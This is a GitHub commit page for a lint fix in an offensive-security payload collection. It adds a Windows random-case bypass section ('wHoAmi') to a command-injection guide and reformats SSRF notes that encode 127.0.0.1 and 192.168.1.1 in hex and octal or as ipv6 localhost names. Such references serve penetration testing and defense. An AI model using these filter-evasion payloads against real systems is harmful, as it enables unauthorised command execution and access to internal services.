Skip to content

Commit b391de2

Browse files
committed
Lint fix
1 parent 72df15e commit b391de2

File tree

2 files changed

+13
-1
lines changed

2 files changed

+13
-1
lines changed

Command Injection/README.md

Lines changed: 9 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -26,6 +26,7 @@
2626
* [Bypass With $()](#bypass-with--1)
2727
* [Bypass With Variable Expansion](#bypass-with-variable-expansion)
2828
* [Bypass With Wildcards](#bypass-with-wildcards)
29+
* [Bypass With Random Case](#bypass-with-random-case)
2930
* [Data Exfiltration](#data-exfiltration)
3031
* [Time Based Data Exfiltration](#time-based-data-exfiltration)
3132
* [Dns Based Data Exfiltration](#dns-based-data-exfiltration)
@@ -349,6 +350,14 @@ powershell C:\*\*2\n??e*d.*? # notepad
349350
@^p^o^w^e^r^shell c:\*\*32\c*?c.e?e # calc
350351
```
351352

353+
### Bypass With Random Case
354+
355+
Windows does not distinguish between uppercase and lowercase letters when interpreting commands or file paths. For example, `DIR`, `dir`, or `DiR` will all execute the same `dir` command.
356+
357+
```powershell
358+
wHoAmi
359+
```
360+
352361
## Data Exfiltration
353362

354363
### Time Based Data Exfiltration

Server Side Request Forgery/README.md

Lines changed: 4 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -178,7 +178,9 @@ http://127.0.1
178178
http://0o177.0.0.1/ = http://127.0.0.1
179179
http://q177.0.0.1/ = http://127.0.0.1
180180
```
181-
* Hex IP
181+
182+
* Hex IP
183+
182184
```powershell
183185
http://0x7f000001 = http://127.0.0.1
184186
http://0xc0a80101 = http://192.168.1.1
@@ -205,6 +207,7 @@ http://127.0.1
205207
### Bypassing via ipv6 hostname
206208
207209
* in Linux /etc/hosts contain this line `::1 localhost ip6-localhost ip6-loopback` but work only if http server running in ipv6
210+
208211
```powershell
209212
http://ip6-localhost = ::1
210213
http://ip6-loopback = ::1

0 commit comments

Comments
 (0)